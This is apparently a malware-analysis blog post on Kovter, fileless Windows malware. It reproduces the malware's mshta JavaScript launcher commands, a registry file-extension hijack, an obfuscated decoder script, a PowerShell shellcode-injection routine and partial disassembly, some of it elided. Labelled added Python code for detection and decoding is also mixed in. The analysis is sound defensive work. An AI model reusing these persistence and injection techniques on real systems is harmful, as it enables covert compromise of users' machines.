29/09/2016
08:53

Kovter: malware that propagates without creating files


Kovter is malware classified as "fileless": its code is not stored in a file but in the Windows registry.
A few weeks ago we found an infection by a malware called Kovter.

Kovter is classified as "fileless" because the malware is not stored in a file but in the Windows registry.
This particular technique has already been in use since 2014, when it was introduced by Trojan.Poweliks.

Kovter began to spread in 2013 and has since evolved into the latest version seen today.


How Kovter starts running


Kovter uses two methods to run automatically:
  • it places in the Startup folder of the Start menu a link with a random name: %user%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<random>.lnk
  • it adds a value to the registry key HKCU\..\Run that runs a link with a random name

Link in the Startup folder of the Start menu

The link in the Startup folder executes the following command:

C:\WINDOWS\system32\mshta.exe "javascript:x6uokfa="1H4Iy4";i4f=new ActiveXObject("WScript.Shell");k1GFd="Lo";eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix"); Cax4C="j";eval(eB38vo);wUtAao9="taH";"

mshta.exe is a legitimate Windows program; here it is run with the following JavaScript code passed as a parameter:


x6uokfa="1H4Iy4";
i4f=new ActiveXObject("WScript.Shell");
k1GFd="Lo";
eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix");
Cax4C="j";
eval(eB38vo);
wUtAao9="taH";

The script reads the contents of the key "HKCU\software\hpkxvramhp\hjmyqgix" and runs them through "eval".


Modifying the key HKCU\..\Run

Kovter adds the following value to the registry key HKCU\..\Run:

[*random] = %user%\AppData\Local\<random>\<random>.lnk

example: C:\Users\<user>\AppData\Local\437680\20c820.lnk

The value name [*random] contains a character that the Regedit utility cannot read, so Regedit displays the following error message:



The randomly named link runs a batch file, also randomly named, stored in the same folder, e.g.:

%user%\AppData\Local\437680\1f41aa.bat

The randomly named batch file (1f41aa.bat) runs the following command:

start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

The "start" command runs the file passed as a parameter, which in our case is d3d9d7.da511ec.
As you can see, this file does not have a known extension such as .exe, yet Windows treats this extension as "executable".


Here Kovter uses a trick: it registers the extension ".da511ec" so that Windows recognizes it.
In fact it adds the following keys to the registry:

[HKEY_CLASSES_ROOT\.da511ec]
@="eb4832"

[HKEY_CLASSES_ROOT\eb4832\shell\open\command]
@="\"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\";joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Adding these keys causes files with the extension ".da511ec" to be opened with mshta.exe, which is passed the malicious JavaScript code as a parameter.

So running the command:
start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

actually executes:
"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\";joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Kovter therefore uses two methods to execute its JavaScript code.
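The persistence chain described above (an extension registered under HKEY_CLASSES_ROOT whose handler is mshta.exe with a "javascript:" payload, plus a Run value pointing to a .lnk under AppData\Local) can be checked for in a registry export. The following Python script is an added example, not part of the original article or of Kovter's code: it parses .reg export text, follows an extension key to its ProgId's shell\open\command, and flags the patterns seen here. The sample export is constructed from the keys shown above; the Run value names "Updater" and "a1b2c3" are assumed.

```python
import re
from typing import Dict, List, Tuple

RegKeys = Dict[str, Dict[str, str]]  # key path -> {value name ("" = default) -> data}


def unescape(s: str) -> str:
    """Undo .reg string escaping (backslash-backslash, backslash-quote)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> RegKeys:
    """Minimal parser for REG_SZ entries of a .reg export; other value types are skipped."""
    keys: RegKeys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else unescape(m.group(1)[1:-1])
            data = m.group(2)
            if data.startswith('"') and data.endswith('"'):
                keys[current][name] = unescape(data[1:-1])
    return keys


def find_mshta_association_hijacks(keys: RegKeys) -> List[Tuple[str, str, str]]:
    """(extension, progid, command) for HKCR extensions whose open handler runs
    mshta.exe with a javascript: URI, as done for .da511ec above."""
    found = []
    for key, values in keys.items():
        m = re.fullmatch(r"HKEY_CLASSES_ROOT\\(\.[^\\]+)", key, re.IGNORECASE)
        progid = values.get("") if m else None
        if not progid:
            continue
        cmd = keys.get(f"HKEY_CLASSES_ROOT\\{progid}\\shell\\open\\command", {}).get("", "")
        low = cmd.lower()
        if "mshta" in low and "javascript:" in low:
            found.append((m.group(1), progid, cmd))
    return found


def find_suspicious_run_values(keys: RegKeys) -> List[Tuple[str, str, str]]:
    """(value name, data, reason) for Run entries: a .lnk under AppData\\Local, an
    mshta javascript: launcher, or a value name with control characters
    (assumed heuristic for names Regedit cannot display)."""
    found = []
    for key, values in keys.items():
        if not re.search(r"\\CurrentVersion\\Run$", key, re.IGNORECASE):
            continue
        for name, data in values.items():
            low = data.lower()
            if low.endswith(".lnk") and "\\appdata\\local\\" in low:
                found.append((name, data, "lnk-in-appdata-local"))
            elif "mshta" in low and "javascript:" in low:
                found.append((name, data, "mshta-javascript"))
            elif any(ord(c) < 32 for c in name):
                found.append((name, data, "control-char-in-value-name"))
    return found


# Constructed sample export: the two HKCR keys from the article plus a Run key with
# one benign entry (assumed) and one Kovter-style .lnk entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.da511ec]
@="eb4832"

[HKEY_CLASSES_ROOT\eb4832\shell\open\command]
@="\"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\");eval(joZ5f);\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="\"C:\\Program Files\\Vendor\\updater.exe\" /silent"
"a1b2c3"="C:\\Users\\user\\AppData\\Local\\437680\\20c820.lnk"
'''

if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_REG)
    for ext, progid, cmd in find_mshta_association_hijacks(parsed):
        print(f"hijacked extension {ext} -> {progid}: {cmd[:60]}")
    for name, data, reason in find_suspicious_run_values(parsed):
        print(f"suspicious Run value {name!r} ({reason}): {data}")
```

On a live system the same checks can be run over the output of reg export for HKCR and HKCU; the parser ignores binary values, so hex-encoded entries are not inspected.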



Analysis of the script stored in "HKCU\software\hpkxvramhp\hjmyqgix"


Here we can see the randomly named registry key HKCU\software\hpkxvramhp created by Kovter:


The script stored in the key "HKCU\software\hpkxvramhp\hjmyqgix" is obfuscated:


ZkiWOtZypMULIBG9qrrD="2nzAtBJtgQYLrRLzrg2TdDm0fTwtN7Ic";
O7PlR5uFSdkPYNrjZhe="DkVifljAd1IPcr5vGPfUtx";
Fohg1ujfWzRyMiXFRcneWxW4="MKXKSj6SJMRSTdQTadNQEmS8ph2NRmgTFJb";
mQfOBK6yjvxYdLNRIGFfGvPw="HZb12ww55xVi1rBXcDPK95PrI9qzNAD6rSFcqagM";
vrRHp0KKrR7ZveKiknDcYK="KGmNljtpOoPLKCThFcqwNQ5yXDsDE2g5hqFL7AkUlg";
lBMX2IP5hjeQCLgHmzbTKmdBo="r26TebqQPsyzVtodCaqe2oPCzirFM2W9sosS";

HjU2="180A4E020B1B373F222D2411191D1926331A380A [..] 9360F1E6850";

ATLaipjOWiJDbQAznVbD9jL="iFl6LyFIHQLkuiwxaH";
DvkCSeJGKXTu5nzfFmzvygFH="Byo15vi5zPcqS2qFTJOctr9wokbdJqpI";
PtExHAoHmpKvm6LfGgh="hWIWb1gtI4ERmSg9jd09";
lmkxbKzuBahY68nRzBrKRmUS="ryLa69HSi7AQfpKXvmgR2Vkeb1BjFDJUPx";

wdQ3co="";
for(kmzTk7ch=0;kmzTk7ch<HjU2.length;kmzTk7ch+=2)
    wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(kmzTk7ch,2),16));

   
ydvrOaLz2HZcnCYYkaj="wTIXNVLV60c5UDugog5qb";
PaPL8mXPEMyhvkf7VeyMdTR="JV4zU6NghDkk91qEK9u9htejMug2O7su";
RAGiRQTTVmMZ83FhbgjyIxAE="Wmo9xzd5h4K2aNyyLQhPdVYJKDTbBem3tt5ysnCzx";
wBYGstBJNlcvNcWCa9="15MCvunOq3VJS4gx825XBJifrvISFcZtvfmamrUWCDtlRd";
OmtaJnSPjpe4pXLYbBF2="oYeGuiuo1wQsYxaZoOpe1NM8y9xwNgXZajkK78H";
JYVks3AYUzeCFJIWfkUPE="4hg7sxnxB6NsncATOG";
YSzOYZNYXNkqN2WJvTHv="YkDbFfePrjt6HId2b4AswRtW";
ljxEXRUIo0Qjpmwr1nMN="ctK3nnLWU4djCYIymXrHLYSFIrUxU3eH";
evgsfov21ZJ="lhvSYvRVpGGvHIxSdRanhtd6gXeHJN4IdBXsrtPBEO17ZGOuDVEj6AkR75izW";

gKTiCbtkFl5a="";
for(NLhDZDUIcZn5XE=kkAphRRJTody9D0lR=0;kkAphRRJTody9D0lR<wdQ3co.length;kkAphRRJTody9D0lR++)
{
    gKTiCbtkFl5a+=String.fromCharCode(wdQ3co.substr(kkAphRRJTody9D0lR,1).charCodeAt()^evgsfov21ZJ.substr(NLhDZDUIcZn5XE,1).charCodeAt());

    NLhDZDUIcZn5XE=(NLhDZDUIcZn5XE<evgsfov21ZJ.length-1)?NLhDZDUIcZn5XE+1:0;

}


ZABLXRQGMq09SljWiVtr="9JKsvjk4P2Ll2Jwz83tmlOVk9mOKBug2bb9p9UDjD";
loSSXayazxvyKP9ewHZw1Lk="lPHxkgl55EwVP5Tpg9cAeFq2";
IAREsOdQtRxh2QjeyYVsws="YfO26CzYlcPCVUjrT48uK36KKOetSxTdY0PwkkLMfqK";
FcXnrjQSGhP1IIGEROKDPDh="f0zkcSKM4h0YaVGzvNJV";
qMyKeAMydCiC1VeFxewzqcwF="JoknyqQX1e8hQfFlDr";
Bu0tWsiVrAbCnBrrQgfco="H80AX2ztfx6kgQ1qbjKNc";

eval(gKTiCbtkFl5a);

MqslAVCZqdnNTFKpuJd7y="3fAmC1pt9tag38olxxXk";
SmUxB5WxYzMXGe7xkTaa="xAQ0ZR16dmiaDcB0nIp1tDTnh0DaEuJs4vu7Pzx937Kb";
fPjxGMkXi2A1yeboAoFzYuFi="i3UxxPkQ1TAYNURKdCb8XflpjQ7sCSjzJJ";
CwjNpyGMjcktWTbjF5EVDD="WSaorKEaleV0u7wrLfc8DN";
zeQ5DhYtR0dvZFkzBuTE="5nrYPt5gTHfW2Qhtvi8mzRt";
YUyBjQEh1bynUrzllDaEg="t5ubP6o1E29LKwk4AE4SlJg";

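The two loops in the script above implement a simple two-stage decoding: the hex string HjU2 is turned into characters, and each character is then XORed with the key string evgsfov21ZJ, whose index wraps back to 0 after the last character. The Python below is an added re-implementation for analysis, not the malware's own code; it also pulls the hex blob and the key out of a script laid out like this one. The constructed sample uses the key from the page with a harmless stand-in payload, since the real blob is elided above.

```python
from __future__ import annotations

import re


def hex_to_text(hex_blob: str) -> str:
    """Stage 1: two hex digits -> one character (the first loop, HjU2 -> wdQ3co)."""
    if len(hex_blob) % 2:
        raise ValueError("hex blob has odd length")
    return "".join(chr(int(hex_blob[i:i + 2], 16)) for i in range(0, len(hex_blob), 2))


def rolling_xor(data: str, key: str) -> str:
    """Stage 2: XOR each char with the key char at a wrapping index (the second
    loop); the index update mirrors (n<key.length-1)?n+1:0."""
    if not key:
        raise ValueError("empty key")
    out, k = [], 0
    for ch in data:
        out.append(chr(ord(ch) ^ ord(key[k])))
        k = k + 1 if k < len(key) - 1 else 0
    return "".join(out)


def decode_stage(hex_blob: str, key: str) -> str:
    """The text that eval(gKTiCbtkFl5a) receives."""
    return rolling_xor(hex_to_text(hex_blob), key)


def encode_stage(plain: str, key: str) -> str:
    """Inverse of decode_stage (XOR is self-inverse); used only to build samples."""
    return "".join(f"{ord(c):02X}" for c in rolling_xor(plain, key))


def extract_payload(script: str) -> tuple[str, str]:
    """Find the hex blob (the only string literal made solely of hex digits) and
    the XOR key (the variable to the right of '^' in the loop) in a script of this layout."""
    hex_match = re.search(r'\b(\w+)="([0-9A-Fa-f]+)";', script)
    key_ref = re.search(r"charCodeAt\(\)\^(\w+)\.substr", script)
    if not hex_match or not key_ref:
        raise ValueError("script does not match the expected layout")
    key_match = re.search(rf'\b{re.escape(key_ref.group(1))}="([^"]*)";', script)
    if not key_match:
        raise ValueError("key variable not found")
    return hex_match.group(2), key_match.group(1)


def deobfuscate(script: str) -> str:
    hex_blob, key = extract_payload(script)
    return decode_stage(hex_blob, key)


# Constructed sample in the same layout as the script above: the key is the one from
# the page, the payload is a harmless stand-in rather than Kovter's code.
SAMPLE_KEY = "lhvSYvRVpGGvHIxSdRanhtd6gXeHJN4IdBXsrtPBEO17ZGOuDVEj6AkR75izW"
SAMPLE_PLAIN = "try{moveTo(-100,-100);resizeTo(0,0);}catch(e){}close();"
SAMPLE_SCRIPT = (
    'ZkiWOtZypMULIBG9qrrD="2nzAtBJtgQYLrRLzrg2TdDm0fTwtN7Ic";\n'
    f'HjU2="{encode_stage(SAMPLE_PLAIN, SAMPLE_KEY)}";\n'
    'wdQ3co="";for(k=0;k<HjU2.length;k+=2)'
    "wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(k,2),16));\n"
    f'evgsfov21ZJ="{SAMPLE_KEY}";\n'
    'g="";for(n=i=0;i<wdQ3co.length;i++){g+=String.fromCharCode('
    "wdQ3co.substr(i,1).charCodeAt()^evgsfov21ZJ.substr(n,1).charCodeAt());"
    "n=(n<evgsfov21ZJ.length-1)?n+1:0;}\n"
    "eval(g);\n"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_SCRIPT))
```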

After de-obfuscation, the variable gKTiCbtkFl5a contains the following code:

tb8QRmeiRjcgQTauWHYd="tFg0e3aPTMijrBS8VYUeg9OTT7w7v2qY8hW16zb2vrN6";
scFiLQBmpVrejk7LOJD="Kc8JS7vM7zJPVjhs6lazVbRXBfgiU7oEFu1Axr";
FwRki5kymuSHEg5pnbPViUBt="oumMQgDIjMtmH6lH1bkK4ZsGpO2ryzZ04IFQ79";
JwFVDCBaEReTikqFfEsYr93P="9H9y6PG2sZeu7OWisk36UtQ";
qpidwGNUkfftJr4pcxHdShzv="vCDAdk54adDpeNAfrJHwY8RE4ZpWrLwFbRufEd2JbI";
zAoJE3XKRMQbBvUuQv4="T46t3bKeodHAmla488ompKrwPwTn";
UScSggymSrjTDXFe2J0qR="WJqcZB6w4HCiAUegDXAJdNKVj3yZpQzRgt0o";
WeSxn5UshbIhExFjzg="zJ6l0g7MdLYp1aLvlRh0pujqcRqfsYTg93psVCzx18BHZye";

try {
    moveTo(-100,-100);
    resizeTo(0,0);
    c9Z=new ActiveXObject("WScript.Shell");
    (c9Z.Environment("Process"))("xcly")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('c2xlZXAoNDApO3Rye [...] leGl0Ow==')))"
    aA0g0r=c9Z.Run("C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:xcly",0,1)
}
catch(e){}close();


This script stores a PowerShell command in the environment variable xcly and runs powershell.exe with "iex $env:xcly" as its parameter, so that "iex" (Invoke-Expression) executes the contents of that variable.
The code passed to "iex" is encoded in Base64; after decoding it we get:


sleep(40);
try {
    function gdelegate    {
        Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
       
        $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System. [..];
        $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public", [..] ");
        $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual", [..] ");
        return $TypeBuilder.CreateType();
    }
   
    function gproc {
        Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
       
        $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
        $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
        return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@( [..] );
    }
   
   
    [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF, [...] , 0xE6,0xED,0xB3;
    [Uint32[]] $op=0;
   
    $r=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualProtect),(gdelegate @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($sc32,$sc32.Length,0x40,$op);
   
    if($r -eq 0) {
        $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
       
        if($pr -ne 0) {
            $memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
           
            for ($i=0;$i -le ($sc32.Length-1);$i++) {
                $memset.Invoke(($pr+$i), $sc32[$i], 1)
            };
            ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
        }
    }
    else {
        ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[Byte[]],[Byte[]],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$sc32,$sc32,0,0);
    }
    sleep(1200);
}
catch{}exit;

Kovter's PowerShell code performs the following operations:
  • The array $sc32 is set to the machine code bytes 0x55,0x8B,0xEC,0x81, etc.
  • It calls the VirtualProtect API on the array $sc32; if the call succeeds, it creates a thread (CreateThread) whose entry point is the array $sc32.
  • If the VirtualProtect call fails, it allocates a memory buffer with VirtualAlloc, copies the array $sc32 into that buffer with memset, and then creates a thread (CreateThread) whose entry point is the address of the allocated buffer.

Let's see what the thread created by Kovter does:


seg000:00000000                 push    ebp
seg000:00000001                 mov     ebp, esp
seg000:00000003                 add     esp, 0FFFFFA00h
seg000:00000009                 push    ebx
seg000:0000000A                 push    esi
seg000:0000000B                 push    edi
seg000:0000000C                 push    ebx
seg000:0000000D                 push    esi
seg000:0000000E                 push    edi
seg000:0000000F                 cld
seg000:00000010                 xor     edx, edx
seg000:00000012                 mov     edx, fs:[edx+30h]
seg000:00000016                 mov     edx, [edx+0Ch]
seg000:00000019                 mov     edx, [edx+14h]
seg000:0000001C

[..]

seg000:0000004A                 mov     [ebp-2Ch], eax
seg000:0000004D                 mov     eax, [ebp-2Ch]
seg000:00000050                 cmp     word ptr [eax], 'ZM'
seg000:00000055                 jnz     loc_400026A
seg000:0000005B                 mov     eax, [ebp-4]
seg000:0000005E                 xor     edx, edx
seg000:00000060                 push    edx
seg000:00000061                 push    eax
seg000:00000062                 mov     eax, [ebp-2Ch]
seg000:00000065                 mov     eax, [eax+3Ch]
seg000:00000068                 cdq
seg000:00000069                 add     eax, [esp]
seg000:0000006C                 adc     edx, [esp+4]
seg000:00000070                 add     esp, 8
seg000:00000073                 mov     [ebp-30h], eax
seg000:00000076                 mov     eax, [ebp-30h]
seg000:00000079                 cmp     dword ptr [eax], 'EP'
seg000:0000007F                 jnz     loc_400026A
seg000:00000085                 mov     eax, [ebp-30h]

[..]

seg000:000000D5                 add     ecx, [ebp-4]
seg000:000000D8                 cmp     dword ptr [ecx], 'daoL'
seg000:000000DE                 jnz     short loc_4000136
seg000:000000E0                 lea     eax, [ecx+4]
seg000:000000E3                 cmp     dword ptr [eax], 'rbiL'
seg000:000000E9                 jnz     short loc_4000136
seg000:000000EB                 lea     eax, [ecx+8]
seg000:000000EE                 cmp     dword ptr [eax], 'Ayra'
seg000:000000F4                 jnz     short loc_4000136
seg000:000000F6                 lea     eax, [ecx+0Ch]
seg000:000000F9                 cmp     byte ptr [eax], 0
seg000:000000FC                 jnz     short loc_4000136
seg000:000000FE                 mov     eax, [ebp-34h]
seg000:00000101                 mov     eax, [eax+24h]
seg000:00000104                 add     eax, [ebp-4]
seg000:00000107                 xor     edx, edx
seg000:00000109                 push    edx
seg000:0000010A                 push    eax
seg000:0000010B                 mov     eax, esi
seg000:0000010D                 add     eax, eax
seg000:0000010F                 cdq
seg000:00000110                 add     eax, [esp]
seg000:00000113                 adc     edx, [esp+4]
seg000:00000117                 add     esp, 8
seg000:0000011A                 mov     ax, [eax]
seg000:0000011D                 mov     edx, [ebp-34h]
seg000:00000120                 mov     edx, [edx+1Ch]
seg000:00000123                 add     edx, [ebp-4]
seg000:00000126                 movzx   eax, ax
seg000:00000129                 shl     eax, 2
seg000:0000012C                 add     edx, eax
seg000:0000012E                 mov     eax, [edx]
seg000:00000130                 add     eax, [ebp-4]
seg000:00000133
seg000:00000133 loc_4000133:
seg000:00000133                 mov     [LoadLibraryA], eax   ;[ebp-44h]
seg000:00000136
seg000:00000136 loc_4000136:                            ; CODE XREF: seg000:000000DEj
seg000:00000136                                         ; seg000:000000E9j ...
seg000:00000136                 cmp     dword ptr [ecx], 'PteG'
seg000:0000013C                 jnz     short loc_4000194
seg000:0000013E                 lea     eax, [ecx+4]
seg000:00000141                 cmp     dword ptr [eax], 'Acor'
seg000:00000147                 jnz     short loc_4000194
seg000:00000149                 lea     eax, [ecx+8]
seg000:0000014C                 cmp     dword ptr [eax], 'erdd'
seg000:00000152                 jnz     short loc_4000194
seg000:00000154                 lea     eax, [ecx+0Eh]

[..]

seg000:0000018E                 add     eax, [ebp-4]
seg000:00000191                 mov     [GetProcAddress], eax  ; [ebp-48h]
seg000:00000194
seg000:00000194 loc_4000194:                            ; CODE XREF: seg000:0000013Cj
seg000:00000194                                         ; seg000:00000147j ...
seg000:00000194                 cmp     dword ptr [ecx], 'triV'
seg000:0000019A                 jnz     short loc_40001F2
seg000:0000019C                 lea     eax, [ecx+4]
seg000:0000019F                 cmp     dword ptr [eax], 'Alau'
seg000:000001A5                 jnz     short loc_40001F2
seg000:000001A7                 lea     eax, [ecx+8]
seg000:000001AA                 cmp     dword ptr [eax], 'coll'
seg000:000001B0                 jnz     short loc_40001F2

[..]

seg000:000001EA                 mov     eax, [edx]
seg000:000001EC                 add     eax, [ebp-4]
seg000:000001EF                 mov     [VirtualAlloc], eax  ; [ebp-58h]

[..]

seg000:0000026A                 mov     byte ptr [ebp-0D1h], 61h ; 'a'
seg000:00000271                 mov     byte ptr [ebp-0D0h], 64h ; 'd'
seg000:00000278                 mov     byte ptr [ebp-0CFh], 76h ; 'v'
seg000:0000027F                 mov     byte ptr [ebp-0CEh], 61h ; 'a'
seg000:00000286                 mov     byte ptr [ebp-0CDh], 70h ; 'p'
seg000:0000028D                 mov     byte ptr [ebp-0CCh], 69h ; 'i'
seg000:00000294                 mov     byte ptr [ebp-0CBh], 33h ; '3'
seg000:0000029B                 mov     byte ptr [ebp-0CAh], 32h ; '2'
seg000:000002A2                 mov     byte ptr [ebp-0C9h], 2Eh ; '.'
seg000:000002A9                 mov     byte ptr [ebp-0C8h], 64h ; 'd'
seg000:000002B0                 mov     byte ptr [ebp-0C7h], 6Ch ; 'l'
seg000:000002B7                 mov     byte ptr [ebp-0C6h], 6Ch ; 'l'
seg000:000002BE                 mov     byte ptr [ebp-0C5h], 0
seg000:000002C5                 lea     eax, [ebp-0D1h]
seg000:000002CB                 push    eax
seg000:000002CC                 call    dword ptr [LoadLibraryA]

[..]

seg000:00000364                 cmp     dword ptr [ecx], 'OgeR'
seg000:0000036A                 jnz     short loc_40003C7
seg000:0000036C                 lea     eax, [ecx+4]
seg000:0000036F                 cmp     dword ptr [eax], 'Knep'
seg000:00000375                 jnz     short loc_40003C7
seg000:00000377                 lea     eax, [ecx+8]
seg000:0000037A                 cmp     dword ptr [eax], 'xEye'
seg000:00000380                 jnz     short loc_40003C7

[..]

seg000:000003C4                 mov     [RegOpenKeyEx], eax   ; [ebp-50h]
seg000:000003C7                 cmp     dword ptr [ecx], 'QgeR'
seg000:000003CD                 jnz     short loc_400042D
seg000:000003CF                 lea     eax, [ecx+4]
seg000:000003D2                 cmp     dword ptr [eax], 'yreu'
seg000:000003D8                 jnz     short loc_400042D
seg000:000003DA                 lea     eax, [ecx+8]
seg000:000003DD                 cmp     dword ptr [eax], 'ulaV'
seg000:000003E3                 jnz     short loc_400042D
seg000:000003E5                 lea     eax, [ecx+0Ch]
seg000:000003E8                 cmp     dword ptr [eax], 'AxEe'

[..]

seg000:0000042A                 mov     [RegQueryValueEx], eax  ; [ebp-54h]

[..]

seg000:0000043A                 mov     eax, [ebp+8]
seg000:0000043D                 add     eax, 0A48h            ; 'software\hpkxvramhp',0
seg000:00000442                 mov     [ebp-84h], eax
seg000:00000448                 mov     eax, [ebp-84h]
seg000:0000044E                 add     eax, 0E4h ; 'õ'        ; eax = 0xb2c
seg000:00000453                 mov     [0xb2c], eax    ; [ebp-88h]
seg000:00000459                 xor     ebx, ebx
seg000:0000045B                 xor     eax, eax
seg000:0000045D                 mov     [ebp-9Ch], eax ; = 0
seg000:00000463                 xor     eax, eax
seg000:00000465                 mov     [ebp-0A0h], eax ; = 0
seg000:0000046B                 lea     eax, [ebp-90h]
seg000:00000471                 push    eax
seg000:00000472                 push    1
seg000:00000474                 push    0
seg000:00000476                 mov     eax, [ebp-84h]
seg000:0000047C                 push    eax
seg000:0000047D                 push    80000002h
seg000:00000482                 call    dword ptr [RegOpenKeyEx]
seg000:00000485                 test    eax, eax
seg000:00000487                 jnz     loc_4000513
seg000:0000048D                 lea     eax, [ebp-0A0h]
seg000:00000493                 push    eax
seg000:00000494                 push    0
seg000:00000496                 lea     eax, [ebp-94h]
seg000:0000049C                 push    eax
seg000:0000049D                 push    0
seg000:0000049F                 mov     eax, [ebp-84h]  ;  'software\hpkxvramhp',0
seg000:000004A5                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:000004A8                 push    eax
seg000:000004A9                 mov     eax, [ebp-90h]
seg000:000004AF                 push    eax
seg000:000004B0                 call    dword ptr [RegQueryValueEx]
seg000:000004B3                 test    eax, eax
seg000:000004B5                 jnz     short loc_4000513
seg000:000004B7                 cmp     dword ptr [ebp-0A0h], 64h ; 'd'
seg000:000004BE                 jbe     short loc_4000513
seg000:000004C0                 push    40h ; '@'
seg000:000004C2                 push    3000h
seg000:000004C7                 mov     eax, [ebp-0A0h]
seg000:000004CD                 push    eax
seg000:000004CE                 push    0
seg000:000004D0                 call    dword ptr [VirtualAlloc]  
seg000:000004D3                 mov     [ebp-9Ch], eax       
seg000:000004D9                 cmp     dword ptr [ebp-9Ch], 0
seg000:000004E0                 jz      short loc_4000513
seg000:000004E2                 lea     eax, [ebp-0A0h]
seg000:000004E8                 push    eax
seg000:000004E9                 mov     eax, [ebp-9Ch]
seg000:000004EF                 push    eax
seg000:000004F0                 lea     eax, [ebp-94h]
seg000:000004F6                 push    eax
seg000:000004F7                 push    0
seg000:000004F9                 mov     eax, [ebp-84h]
seg000:000004FF                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq
seg000:00000502                 push    eax
seg000:00000503                 mov     eax, [ebp-90h]  ; hkey
seg000:00000509                 push    eax
seg000:0000050A                 call    dword ptr [RegQueryValueEx] 

[..]

seg000:00000A20                 mov     eax, [ebp-30h]
seg000:00000A23                 mov     eax, [eax+28h]   ; entry point of the file
seg000:00000A26                 add     eax, [ebp-8]
seg000:00000A29                 mov     [ebp-0Ch], eax   ; image + entry point
seg000:00000A2C                 xor     eax, eax
seg000:00000A2E                 push    eax
seg000:00000A2F                 push    1
seg000:00000A31                 push    dword ptr [ebp-8]
seg000:00000A34                 call    dword ptr [ebp-0Ch] ; jumps to the entry point
seg000:00000A37
seg000:00000A37 loc_4000A37:                            ; CODE XREF: seg000:00000757j
seg000:00000A37                                         ; seg000:00000775j ...
seg000:00000A37                 push    0
seg000:00000A39                 call    dword ptr [ExitProcess]
seg000:00000A3C                 pop     edi
seg000:00000A3D                 pop     esi
seg000:00000A3E                 pop     ebx
seg000:00000A3F                 mov     esp, ebp
seg000:00000A41                 pop     ebp
seg000:00000A42                 retn    4

[..]
seg000:00000A48 aSoftwareHpkxvr db 'software\hpkxvramhp',0
[..]
seg000:00000A89 aJpmyhhqq       db 'jpmyhhqq',0
[..]
seg000:00000B2C                 push    ebp
seg000:00000B2D                 mov     ebp, esp
seg000:00000B2F                 pusha
seg000:00000B30
seg000:00000B30 loc_4000B30:
seg000:00000B30                 mov     edi, [ebp+8]
seg000:00000B33                 mov     esi, [ebp+0Ch]
seg000:00000B36                 mov     ecx, [ebp+10h]
seg000:00000B39                 rep movsb
seg000:00000B3B                 popa
seg000:00000B3C                 pop     ebp
seg000:00000B3D                 retn    0Ch
[..]


